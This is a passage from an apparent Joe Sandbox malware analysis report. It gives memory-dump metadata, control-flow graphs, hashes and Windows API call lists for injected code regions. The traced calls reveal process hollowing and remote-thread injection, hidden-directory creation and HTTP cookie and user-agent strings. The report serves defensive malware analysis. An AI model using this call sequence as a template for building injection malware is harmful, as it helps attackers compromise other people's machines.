              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 13fec5c9fe638e7d3a3575a16c9a647fe03491c9faa9c0d52d61d37c0d377262
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: C2219D3190021AAFDB11DF79C849B9DBBB5AF04710F098225F955AF2D1EB70A810CBA4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 29 d61528-d615d4 call d6375b call d60cdd call d61386 * 6 46 d615d9-d615da 29->46
              Memory Dump Source
              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction ID: 372c0278b42354de2f03ac963bba075068ed9caf850db88c84dc71b41d590ff6
              • Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction Fuzzy Hash: EE11C1B24145149FDF03AF60C5C4CAA73ECEE40704B450A6AAD85EF44EEF709154CAF5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 47 d609a8-d609ca 49 d60b32-d60b33 47->49 50 d609d0-d60a14 call d60a1a 47->50 50->49
              Memory Dump Source
              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: d1b8698850c36b551d4aef4108b1e0c37064d24966ec4278c54291a7cbd13300
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: EC014971644318AFEB12DE50CC41FA673FCEF44B04F500195BB45EE0C5DA7065448AE9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 54 d63fde-d63ffa call d6375b call d638a7 59 d6400c-d6403b call d6404d * 3 54->59 60 d63ffc-d6400a call d6411e 54->60 73 d64046 59->73 67 d6404b-d6404c 60->67 73->67 74 d64046 call d6404d 73->74 74->67
              Memory Dump Source
              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction ID: 7ec128fdc72bf20784acffaaa6e3e0d5a9310e1518eb4999ac9cfb1681defbc1
              • Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction Fuzzy Hash: A6F0C9705483A0DBFB517BB0CC8AB4D36A8DF41709F040091FB4ABF496CE7895909E76

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 75 d647f7-d64810 call d63b24 78 d64812-d6481b call d63b76 75->78 79 d64820-d64850 75->79 78->79 82 d64856-d64878 79->82 83 d6496a-d6496f 79->83 82->83 85 d6487e-d648a3 82->85 87 d648a5-d648ba 85->87 88 d648bb-d648dd 85->88 87->88 90 d64942-d6494c 88->90 91 d648df-d64901 88->91 92 d64963-d64968 90->92 93 d6494e-d64960 call d6377b 90->93 91->90 96 d64903-d64925 91->96 92->83 93->92 96->90 99 d64927-d6493f 96->99 99->90
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: 47ed27bf5f6827464b64d30b7cd586f801aaf95ff0d0ceb2b2a2ddd1c523576b
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: C74174B2600208BFEF129F64CC84BEEBBB9FF84744F154159EA44AB154DB709A50CFA4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 d647f8-d64803 101 d6480e-d64810 100->101 102 d64809 call d63b24 100->102 103 d64812-d6481b call d63b76 101->103 104 d64820-d64850 101->104 102->101 103->104 107 d64856-d64878 104->107 108 d6496a-d6496f 104->108 107->108 110 d6487e-d648a3 107->110 112 d648a5-d648ba 110->112 113 d648bb-d648dd 110->113 112->113 115 d64942-d6494c 113->115 116 d648df-d64901 113->116 117 d64963-d64968 115->117 118 d6494e-d64960 call d6377b 115->118 116->115 121 d64903-d64925 116->121 117->108 118->117 121->115 124 d64927-d6493f 121->124 124->115
              Strings
              Memory Dump Source
              • Source File: 00000020.00000002.3356298634.0000000000D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_32_2_d60000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: c235768e580db4b26e0156dda21e079f6bda2cd72bd8fb40d3d548f133835dc4
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: E54165B2600208BFEF129F64CC48BDEBBB9FF84744F154159EA44AB154DB709A54CFA4

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 40b4fc8f6729bc0b59034b30eef40e39e0f26fdfac25dc564f08aa919d3e04be
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 8B415071644214AFEB229F60CC85FA977BCEF44748F040195BA49FE0D6DAB0AAD0CA65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 15 e11386-e11393 16 e11435-e11436 15->16 17 e11399-e1139f 15->17 17->16 18 e113a5-e113bb 17->18 18->16 20 e113bd-e113d0 18->20 22 e113d2-e113d9 20->22 23 e113dc-e113ec call e10ebd 22->23 26 e113ee-e113fc 23->26 27 e11401-e1142c 26->27 28 e113fe 26->28 27->16 28->27
              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 885839e345444ae3b26f3a5103d39deac75cadd3afa698911024d4a055bd93a6
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: FF219D31900226AFDB11DF78C849B9DBBB5AF04714F058265FA65BF2D0E770A850CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 29 e11528-e115d4 call e1375b call e10cdd call e11386 * 6 46 e115d9-e115da 29->46
              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
              • Instruction ID: f5ba2dfc3a595277c8171dfbf80d7504a47678decd6b1b42a99c4fdb2534b9ad
              • Opcode Fuzzy Hash: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
              • Instruction Fuzzy Hash: 8C11BFB24045149EDF03AF20C5C4CEA73ECEE40704B460AAAAD85EF44EEF709194CAE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 47 e109a8-e109ca 49 e109d0-e10a14 call e10a1a 47->49 50 e10b32-e10b33 47->50 49->50
              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: a7315e410356c332060183bf0a9f60230e0d0f20eedd974560e69c7274da7810
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: 2B01E171644318AFEB129A50CC86FAA73ECEF54B08F500595BB49FE0C5EAB065848A99

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 54 e13fde-e13ffa call e1375b call e138a7 59 e1400c-e1403b call e1404d * 3 54->59 60 e13ffc-e1400a call e1411e 54->60 73 e14046 59->73 68 e1404b-e1404c 60->68 73->68 74 e14046 call e1404d 73->74 74->68
              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction ID: 11a70f58982d5ba3143c3fe0a0aee720dbdd2b4ed7956dfaa127c2365fad37fc
              • Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction Fuzzy Hash: 39F01CF0548284D6EB517BB18C8ABCD36E89F05709F082091BB4ABE5D6CE7849D09E73

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 75 e147f7-e14810 call e13b24 78 e14820-e14850 75->78 79 e14812-e1481b call e13b76 75->79 82 e14856-e14878 78->82 83 e1496a-e1496f 78->83 79->78 82->83 85 e1487e-e148a3 82->85 87 e148a5-e148ba 85->87 88 e148bb-e148dd 85->88 87->88 90 e14942-e1494c 88->90 91 e148df-e14901 88->91 92 e14963-e14968 90->92 93 e1494e-e14960 call e1377b 90->93 91->90 96 e14903-e14925 91->96 92->83 93->92 96->90 99 e14927-e1493f 96->99 99->90
              Strings
              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: 4cb01924d64e39d0bcef8b13a9d6f9de6a56be6c98b03d755a869347a78b57ec
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: BB4185B2600209BFEF129F64CC44BEEBBB9FF84744F154059EA44BB254DB709A90CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 e147f8-e14803 101 e1480e-e14810 100->101 102 e14809 call e13b24 100->102 103 e14820-e14850 101->103 104 e14812-e1481b call e13b76 101->104 102->101 107 e14856-e14878 103->107 108 e1496a-e1496f 103->108 104->103 107->108 110 e1487e-e148a3 107->110 112 e148a5-e148ba 110->112 113 e148bb-e148dd 110->113 112->113 115 e14942-e1494c 113->115 116 e148df-e14901 113->116 117 e14963-e14968 115->117 118 e1494e-e14960 call e1377b 115->118 116->115 121 e14903-e14925 116->121 117->108 118->117 121->115 124 e14927-e1493f 121->124 124->115
              Strings
              Memory Dump Source
              • Source File: 00000021.00000002.3360010666.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_33_2_e10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: 6f94d75579c5b823cf8c69a2e3016f4ad14e0ba8cce454222f4ad3d07e71921c
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: A54152B2600209BFEF129F64CC48BDEBBB9FF84744F154059EA44BA254DB749A90CB94
              APIs
                • Part of subcall function 008B09CC: OpenMutexA.KERNEL32(001F0001,00000000), ref: 008B09E6
                • Part of subcall function 008B09CC: GetStartupInfoA.KERNEL32(00000000), ref: 008B09FE
              • ExitProcess.KERNEL32(00000000), ref: 008B001D
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: ExitInfoMutexOpenProcessStartup
              • String ID:
              • API String ID: 213680645-0
              • Opcode ID: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
              • Instruction ID: f0f0e538f7286c12f200f563276c3c4a3a64b75394928d1031e9b1840abaa6fc
              • Opcode Fuzzy Hash: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
              • Instruction Fuzzy Hash: 6D72DF6144E3C44FDB279B744A696E77FB8FE23300B1900CBD5C2DA2A3D114A919CF6A

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00001388), ref: 001D099A
              • RtlExitUserThread.NTDLL(00000000), ref: 001D09A2
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 001D09C2
              • GetStartupInfoA.KERNEL32(00000000), ref: 001D09DA
                • Part of subcall function 001D0A1A: CreateProcessA.KERNEL32(00000000,001D0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001D0A21
                • Part of subcall function 001D0A1A: GetThreadContext.KERNEL32(?,00000000), ref: 001D0A49
                • Part of subcall function 001D0A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001D0A74
                • Part of subcall function 001D0A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001D59C8,00000000,00000000,00000002), ref: 001D0AB9
                • Part of subcall function 001D0A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001D0AE7
                • Part of subcall function 001D0A1A: ResumeThread.KERNEL32(?), ref: 001D0AF7
                • Part of subcall function 001D0A1A: Sleep.KERNEL32(000003E8), ref: 001D0B07
                • Part of subcall function 001D0A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001D0B1E
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
              • String ID:
              • API String ID: 1099281029-0
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 082682ca218d509e8b97d2b081184659538a72c7bb53fd5271c365d2e80bc17b
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 79416E71644218AFEB229F60CC85FA973ACEF44744F040196BA49FE1D6DB70AA90CA65

              Control-flow Graph

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,001D3FD4,0000000A,?,00000000,0000000A), ref: 001D3FFE
              • Sleep.KERNELBASE(000003E8,00000000,?,001D3FD4,0000000A,?,00000000,0000000A), ref: 001D4020
              • Sleep.KERNEL32(000007D0), ref: 001D4030
              • Sleep.KERNEL32(00000BB8), ref: 001D4040
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: ca8bade2fa3014c6295aeb49c6cd976e82bb18be483983e3bf0c9f83518ae4e7
              • Instruction ID: cb225ea012cf25cff74d14a7e588ba9ae8d8254d5375bee7332d2628dd3bb714
              • Opcode Fuzzy Hash: ca8bade2fa3014c6295aeb49c6cd976e82bb18be483983e3bf0c9f83518ae4e7
              • Instruction Fuzzy Hash: 22F030705482D0D7FB507BB08C8AB8D37A89F21709F040192FB4DBE696CF7855509EB2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 410 1d1386-1d1393 411 1d1399-1d139f 410->411 412 1d1435-1d1436 410->412 411->412 413 1d13a5-1d13bb VirtualProtect 411->413 413->412 414 1d13bd-1d13d0 VirtualAlloc 413->414 414->414 415 1d13d2-1d13d9 414->415 416 1d13dc-1d13ec call 1d0ebd 415->416 419 1d13ee-1d13fc 416->419 420 1d13fe 419->420 421 1d1401-1d142f VirtualProtect 419->421 420->421 421->412
              APIs
              • VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13B3
              • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13C8
              • VirtualProtect.KERNELBASE(?,00000020,?,001D1434,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D142F
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 81cce27e9cc97897a17432a1da4ec70d2c481a3048042f36efaf7e8e6c3cf0c8
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 84219D71900216BFDB12DF78C849B9DBBB5AF04710F058226F955AF2D0E770A810CB94

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(001D1522,00000006,?,00000000), ref: 001D152D
                • Part of subcall function 001D0CDD: GetProcAddress.KERNEL32(00000000,001D04B1), ref: 001D0CEA
                • Part of subcall function 001D1386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13B3
                • Part of subcall function 001D1386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D13C8
                • Part of subcall function 001D1386: VirtualProtect.KERNELBASE(?,00000020,?,001D1434,?,?,?,?,?,?,?,?,001D155C,001D1439,00000000,001D1439), ref: 001D142F
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: Virtual$Protect$AddressAllocLibraryLoadProc
              • String ID:
              • API String ID: 2821516111-0
              • Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction ID: 2d2f9b8d02abb84d4c96300e0439f1bfeb0b1241f0ed4f782f31c4e334e0294e
              • Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
              • Instruction Fuzzy Hash: A811BFB2404514BEDF03AF20C5C4CAA73ECFE50704B450A6BAD85EF44AEF749154CAE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 439 8b3511-8b356a GetVolumeInformationA call 8b373c
              APIs
              • GetVolumeInformationA.KERNELBASE(008B350D,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 008B3511
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: InformationVolume
              • String ID:
              • API String ID: 2039140958-0
              • Opcode ID: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
              • Instruction ID: bd24ae08cee234d69d512d34c1bc1e270448e30e104c56c6287d8b6f419b6be0
              • Opcode Fuzzy Hash: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
              • Instruction Fuzzy Hash: 6FF0F8B5900154DBEF02EF64C485A9A7BB8AF44305F4515C4AE4DFF20ACB30A6598F64
              APIs
              • VirtualAllocEx.KERNEL32(0000094C,00000000,008B59EC,00003000,00000040,?,?,?,008B0DED,00000000,0000094C,00000000), ref: 008B0E6B
              • WriteProcessMemory.KERNEL32(0000094C,008B0024,00000000,008B59EC,00000000,?,008B0DED,00000000,0000094C,00000000), ref: 008B0E89
              • IsWow64Process.KERNEL32(0000094C,?,?,?,008B0DED,00000000,0000094C,00000000), ref: 008B0E9F
              • CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B0ED5
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction ID: 1d07042dd9484bc8a5124d3dcfb53530dd59f0a1757de902736fbec867726bf5
              • Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction Fuzzy Hash: 9E113D32100209BBFF205F15CC45F963B69EF80754F144411FE05FE195E771E561CAA8
              APIs
              • VirtualAllocEx.KERNEL32(0000094C,00000000,001D59C8,00003000,00000040,?,?,?,001D0DC9,00000000,0000094C,00000000), ref: 001D0E47
              • WriteProcessMemory.KERNEL32(0000094C,001D0000,00000000,001D59C8,00000000,?,001D0DC9,00000000,0000094C,00000000), ref: 001D0E65
              • IsWow64Process.KERNEL32(0000094C,?,?,?,001D0DC9,00000000,0000094C,00000000), ref: 001D0E7B
              • CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D0EB1
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction ID: 15c529a3ddd503f89164435e89b95c21f57bb2a4f6bbbab16ab4c1d3f0f28629
              • Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction Fuzzy Hash: D6118C32200204FFFF215F24CC85FAA3B69EF84754F188451FE48BE695D770A560CAA8

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(008B06A3,00000009,?,00000000), ref: 008B06B1
                • Part of subcall function 008B0D01: GetProcAddress.KERNEL32(00000000,008B04D5), ref: 008B0D0E
                • Part of subcall function 008B06F2: lstrcat.KERNEL32(00000000,008B06E9), ref: 008B0701
                • Part of subcall function 008B06F2: lstrcmpiA.KERNEL32(?,00000000), ref: 008B071B
                • Part of subcall function 008B06F2: Sleep.KERNEL32(00001388), ref: 008B072E
                • Part of subcall function 008B06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B074F
                • Part of subcall function 008B06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0761
                • Part of subcall function 008B06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B0782
                • Part of subcall function 008B06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0794
                • Part of subcall function 008B06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B07B5
                • Part of subcall function 008B06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B07C7
                • Part of subcall function 008B06F2: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 008B07DB
                • Part of subcall function 008B06F2: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 008B0822
                • Part of subcall function 008B06F2: Sleep.KERNEL32(00001388), ref: 008B0841
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction ID: 31d6e29edee83bdbeb72d0cddcee7ed6896cd4b70af18f67abcb15bb31fdd5c2
              • Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction Fuzzy Hash: E1410EB24042149EDB126BA08C89FEA77ACFF44700F4505A9BB85EF156EE309680CFA5

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(001D067F,00000009,?,00000000), ref: 001D068D
                • Part of subcall function 001D0CDD: GetProcAddress.KERNEL32(00000000,001D04B1), ref: 001D0CEA
                • Part of subcall function 001D06CE: lstrcat.KERNEL32(00000000,001D06C5), ref: 001D06DD
                • Part of subcall function 001D06CE: lstrcmpiA.KERNEL32(?,00000000), ref: 001D06F7
                • Part of subcall function 001D06CE: Sleep.KERNEL32(00001388), ref: 001D070A
                • Part of subcall function 001D06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D072B
                • Part of subcall function 001D06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D073D
                • Part of subcall function 001D06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D075E
                • Part of subcall function 001D06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D0770
                • Part of subcall function 001D06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D0791
                • Part of subcall function 001D06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D07A3
                • Part of subcall function 001D06CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001D07B7
                • Part of subcall function 001D06CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001D07FE
                • Part of subcall function 001D06CE: Sleep.KERNEL32(00001388), ref: 001D081D
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
